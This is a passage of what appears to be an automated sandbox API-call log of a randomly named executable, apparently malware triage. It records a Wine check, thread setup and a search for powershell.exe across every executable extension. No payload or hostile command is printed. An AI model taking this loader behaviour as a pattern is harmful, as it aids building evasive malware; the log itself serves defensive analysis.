# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 02.04.2020 06:24:08.455 Process: id = "1" image_name = "l7apabdp1qtgrjcl.exe" filename = "c:\\users\\fd1hvy\\desktop\\l7apabdp1qtgrjcl.exe" page_root = "0x12213000" os_pid = "0x13d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x560" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\l7APAbdp1QTgRjcl.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x13d4 [0080.558] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x772d0000 [0080.559] GetProcAddress (hModule=0x772d0000, lpProcName="AddDllDirectory") returned 0x74d2bbb0 [0080.559] GetProcAddress (hModule=0x772d0000, lpProcName="AddVectoredContinueHandler") returned 0x77a228c0 [0080.559] GetProcAddress (hModule=0x772d0000, lpProcName="GetQueuedCompletionStatusEx") returned 0x772e5300 [0080.559] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryExA") returned 0x772e5aa0 [0080.559] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryExW") returned 0x772e5ac0 [0080.559] LoadLibraryExA (lpLibFileName="advapi32.dll", hFile=0x0, dwFlags=0x800) returned 0x756e0000 [0086.458] GetProcAddress (hModule=0x756e0000, lpProcName="SystemFunction036") returned 0x744329e0 [0086.458] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x800) returned 0x77970000 [0086.458] GetProcAddress (hModule=0x77970000, lpProcName="NtWaitForSingleObject") returned 0x779e1d30 [0086.459] LoadLibraryExA (lpLibFileName="winmm.dll", hFile=0x0, dwFlags=0x800) returned 0x742b0000 [0088.243] GetProcAddress (hModule=0x742b0000, lpProcName="timeBeginPeriod") returned 0x742b4350 [0088.243] GetProcAddress (hModule=0x742b0000, lpProcName="timeEndPeriod") returned 0x742bd030 [0088.243] LoadLibraryExA (lpLibFileName="ws2_32.dll", hFile=0x0, dwFlags=0x800) returned 0x754f0000 [0088.767] GetProcAddress (hModule=0x754f0000, lpProcName="WSAGetOverlappedResult") returned 0x755039f0 [0088.767] GetProcAddress (hModule=0x77970000, lpProcName="wine_get_version") returned 0x0 [0088.767] SetErrorMode (uMode=0x2) returned 0x0 [0088.767] SetErrorMode (uMode=0x8003) returned 0x2 [0088.767] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x4579a0) returned 0x9ef8a0 [0088.768] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4579b0) returned 0x0 [0088.768] SetConsoleCtrlHandler (HandlerRoutine=0x4579c0, Add=1) returned 1 [0088.768] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0088.769] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x19fe8c, lpSystemAffinityMask=0x19fe88 | out: lpProcessAffinityMask=0x19fe8c, lpSystemAffinityMask=0x19fe88) returned 1 [0088.769] GetSystemInfo (in: lpSystemInfo=0x19fec8 | out: lpSystemInfo=0x19fec8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0088.770] SetProcessPriorityBoost (hProcess=0xffffffff, bDisablePriorityBoost=1) returned 1 [0088.771] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x860000 [0088.772] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x2000, flProtect=0x4) returned 0x30000 [0088.772] VirtualAlloc (lpAddress=0x30000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x30000 [0088.772] VirtualAlloc (lpAddress=0x0, dwSize=0x10221000, flAllocationType=0x2000, flProtect=0x4) returned 0xae0000 [0088.782] VirtualAlloc (lpAddress=0x800000, dwSize=0x20400000, flAllocationType=0x2000, flProtect=0x4) returned 0x0 [0088.782] VirtualAlloc (lpAddress=0x0, dwSize=0x20400000, flAllocationType=0x2000, flProtect=0x4) returned 0x10d10000 [0088.809] VirtualFree (lpAddress=0x10d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.810] VirtualAlloc (lpAddress=0x11000000, dwSize=0x20000000, flAllocationType=0x2000, flProtect=0x4) returned 0x11000000 [0088.829] SystemFunction036 (in: RandomBuffer=0x67a3b0, RandomBufferLength=0x4 | out: RandomBuffer=0x67a3b0) returned 1 [0088.829] VirtualAlloc (lpAddress=0x11000000, dwSize=0x400000, flAllocationType=0x1000, flProtect=0x4) returned 0x11000000 [0088.839] VirtualAlloc (lpAddress=0xae0000, dwSize=0x41000, flAllocationType=0x1000, flProtect=0x4) returned 0xae0000 [0088.840] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0088.841] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0088.841] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x4) returned 0x8d0000 [0088.841] VirtualAlloc (lpAddress=0x11000000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11000000 [0088.842] VirtualAlloc (lpAddress=0x11002000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11002000 [0088.842] SystemFunction036 (in: RandomBuffer=0x67a5a0, RandomBufferLength=0x40 | out: RandomBuffer=0x67a5a0) returned 1 [0088.842] VirtualAlloc (lpAddress=0x11004000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11004000 [0088.844] VirtualAlloc (lpAddress=0x11006000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11006000 [0088.845] GetEnvironmentStringsW () returned 0x9f8678* [0088.845] VirtualAlloc (lpAddress=0x11008000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11008000 [0088.845] VirtualAlloc (lpAddress=0x1100a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1100a000 [0088.846] VirtualAlloc (lpAddress=0x1100c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1100c000 [0088.846] VirtualAlloc (lpAddress=0x1100e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1100e000 [0088.846] VirtualAlloc (lpAddress=0x11010000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11010000 [0088.846] VirtualAlloc (lpAddress=0x11012000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11012000 [0088.847] VirtualAlloc (lpAddress=0x11014000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11014000 [0088.847] VirtualAlloc (lpAddress=0x11016000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11016000 [0088.847] FreeEnvironmentStringsW (penv=0x9f8678) returned 1 [0088.847] LoadLibraryExA (lpLibFileName="powrprof.dll", hFile=0x0, dwFlags=0x800) returned 0x74460000 [0090.057] GetProcAddress (hModule=0x74460000, lpProcName="PowerRegisterSuspendResumeNotification") returned 0x74466b00 [0090.057] PowerRegisterSuspendResumeNotification (in: Flags=0x2, Recipient=0x19fe54, RegistrationHandle=0x19fe50 | out: RegistrationHandle=0x19fe50) returned 0x0 [0090.058] VirtualAlloc (lpAddress=0x11018000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x11018000 [0090.059] VirtualAlloc (lpAddress=0x1101c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1101c000 [0090.059] VirtualAlloc (lpAddress=0x11020000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11020000 [0090.059] VirtualAlloc (lpAddress=0x11022000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x11022000 [0090.060] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19fe9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19fe9c*=0x124) returned 1 [0090.060] VirtualQuery (in: lpAddress=0x19feac, lpBuffer=0x19feac, dwLength=0x1c | out: lpBuffer=0x19feac*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.060] VirtualAlloc (lpAddress=0x1102a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1102a000 [0090.060] VirtualAlloc (lpAddress=0x1102c000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x1102c000 [0090.061] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x457b20, lpParameter=0x1102a1e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0090.061] CloseHandle (hObject=0x128) returned 1 [0090.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x457b20, lpParameter=0x1102a3c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0090.062] CloseHandle (hObject=0x128) returned 1 [0090.062] VirtualAlloc (lpAddress=0x11034000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11034000 [0090.063] VirtualAlloc (lpAddress=0x11036000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11036000 [0090.063] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x457b20, lpParameter=0x1102a5a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0090.063] CloseHandle (hObject=0x128) returned 1 [0090.063] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x128 [0090.064] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x12c [0090.064] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0090.080] VirtualAlloc (lpAddress=0x11086000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11086000 [0090.080] VirtualAlloc (lpAddress=0x11088000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11088000 [0090.081] VirtualAlloc (lpAddress=0x1108a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1108a000 [0090.081] VirtualAlloc (lpAddress=0x1108c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1108c000 [0090.081] VirtualAlloc (lpAddress=0x1108e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1108e000 [0090.081] VirtualAlloc (lpAddress=0x11090000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11090000 [0090.081] VirtualAlloc (lpAddress=0x11092000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11092000 [0090.082] VirtualAlloc (lpAddress=0x11094000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11094000 [0090.082] VirtualAlloc (lpAddress=0x11096000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11096000 [0090.082] VirtualAlloc (lpAddress=0x11098000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11098000 [0090.083] VirtualAlloc (lpAddress=0x1109a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1109a000 [0090.083] VirtualAlloc (lpAddress=0x1109c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1109c000 [0090.083] VirtualAlloc (lpAddress=0x1109e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1109e000 [0090.083] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x800) returned 0x772d0000 [0090.083] VirtualAlloc (lpAddress=0x110a0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110a0000 [0090.084] GetProcAddress (hModule=0x772d0000, lpProcName="GetStdHandle") returned 0x772e5330 [0090.084] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0090.084] GetProcAddress (hModule=0x772d0000, lpProcName="SetHandleInformation") returned 0x7733eae0 [0090.084] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0090.084] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0090.084] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0090.084] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0090.084] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0090.084] VirtualAlloc (lpAddress=0x110a2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110a2000 [0090.084] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemDirectoryW") returned 0x772e5490 [0090.084] GetSystemDirectoryW (in: lpBuffer=0x110a2000, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0090.084] VirtualAlloc (lpAddress=0x110a4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110a4000 [0090.085] VirtualAlloc (lpAddress=0x110a6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110a6000 [0090.085] VirtualAlloc (lpAddress=0x110a8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110a8000 [0090.085] VirtualAlloc (lpAddress=0x110aa000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110aa000 [0090.085] LoadLibraryExW (lpLibFileName="ws2_32.dll", hFile=0x0, dwFlags=0x800) returned 0x754f0000 [0090.085] GetProcAddress (hModule=0x754f0000, lpProcName="WSAStartup") returned 0x754f5b40 [0090.086] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1102dde4 | out: lpWSAData=0x1102dde4) returned 0 [0090.090] GetProcAddress (hModule=0x772d0000, lpProcName="CancelIoEx") returned 0x772e42b0 [0090.090] VirtualAlloc (lpAddress=0x110ac000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x110ac000 [0090.090] VirtualAlloc (lpAddress=0x110b4000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x110b4000 [0090.091] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileCompletionNotificationModes") returned 0x773250d0 [0090.091] GetProcAddress (hModule=0x754f0000, lpProcName="WSAEnumProtocolsW") returned 0x7550b2f0 [0090.091] WSAEnumProtocolsW (in: lpiProtocols=0x110b6f48, lpProtocolBuffer=0x110b6f50, lpdwBufferLength=0x110b6f44 | out: lpProtocolBuffer=0x110b6f50, lpdwBufferLength=0x110b6f44) returned 4 [0091.071] SetEvent (hEvent=0x174) returned 1 [0091.072] GetProcAddress (hModule=0x772d0000, lpProcName="GetConsoleMode") returned 0x7733f450 [0091.072] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0x110bbf50 | out: lpMode=0x110bbf50) returned 0 [0091.072] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileType") returned 0x7733ef60 [0091.072] GetFileType (hFile=0x0) returned 0x0 [0091.072] VirtualAlloc (lpAddress=0x110bc000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110bc000 [0091.072] SetEvent (hEvent=0x150) returned 1 [0091.072] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x10f50000 [0091.072] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0x110bbf50 | out: lpMode=0x110bbf50) returned 0 [0091.072] GetFileType (hFile=0x0) returned 0x0 [0091.072] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0x110bbf50 | out: lpMode=0x110bbf50) returned 0 [0091.072] GetFileType (hFile=0x0) returned 0x0 [0091.073] GetProcAddress (hModule=0x772d0000, lpProcName="GetCommandLineW") returned 0x772e4cc0 [0091.073] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\l7APAbdp1QTgRjcl.exe\" " [0091.073] VirtualAlloc (lpAddress=0x110be000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110be000 [0091.073] VirtualAlloc (lpAddress=0x110c0000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x110c0000 [0091.073] VirtualAlloc (lpAddress=0x110c6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110c6000 [0091.074] VirtualAlloc (lpAddress=0x110c8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110c8000 [0091.074] VirtualAlloc (lpAddress=0x110ca000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110ca000 [0091.074] VirtualAlloc (lpAddress=0x110cc000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110cc000 [0091.074] VirtualAlloc (lpAddress=0x110ce000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110ce000 [0091.074] GetProcAddress (hModule=0x772d0000, lpProcName="GetEnvironmentVariableW") returned 0x772e4fb0 [0091.074] GetEnvironmentVariableW (in: lpName="GODEBUG", lpBuffer=0x110ce000, nSize=0x64 | out: lpBuffer="") returned 0x0 [0091.075] VirtualAlloc (lpAddress=0x110d0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110d0000 [0091.075] VirtualAlloc (lpAddress=0x110d2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110d2000 [0091.075] VirtualAlloc (lpAddress=0x110d4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x110d4000 [0091.075] VirtualAlloc (lpAddress=0x110d8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110d8000 [0091.076] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x110ce0d0, nSize=0x64 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0091.076] VirtualAlloc (lpAddress=0x110da000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110da000 [0091.076] VirtualAlloc (lpAddress=0x110dc000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110dc000 [0091.076] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileAttributesExW") returned 0x7733ef00 [0091.076] GetFileAttributesExW (in: lpFileName="powershell.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.077] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0091.077] CreateFileW (lpFileName="powershell.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.077] GetFileAttributesExW (in: lpFileName="powershell.exe.com" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.077] CreateFileW (lpFileName="powershell.exe.com" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.077] GetFileAttributesExW (in: lpFileName="powershell.exe.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.077] CreateFileW (lpFileName="powershell.exe.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.077] GetFileAttributesExW (in: lpFileName="powershell.exe.bat" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.077] CreateFileW (lpFileName="powershell.exe.bat" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.077] GetFileAttributesExW (in: lpFileName="powershell.exe.cmd" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.077] CreateFileW (lpFileName="powershell.exe.cmd" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.077] GetFileAttributesExW (in: lpFileName="powershell.exe.vbs" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.077] CreateFileW (lpFileName="powershell.exe.vbs" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.077] GetFileAttributesExW (in: lpFileName="powershell.exe.vbe" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.078] CreateFileW (lpFileName="powershell.exe.vbe" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.078] GetFileAttributesExW (in: lpFileName="powershell.exe.js" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.078] CreateFileW (lpFileName="powershell.exe.js" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.078] GetFileAttributesExW (in: lpFileName="powershell.exe.jse" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.078] CreateFileW (lpFileName="powershell.exe.jse" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.078] GetFileAttributesExW (in: lpFileName="powershell.exe.wsf" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.078] CreateFileW (lpFileName="powershell.exe.wsf" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.078] GetFileAttributesExW (in: lpFileName="powershell.exe.wsh" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.078] CreateFileW (lpFileName="powershell.exe.wsh" (normalized: "c:\\users\\fd1hvy\\desktop\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, 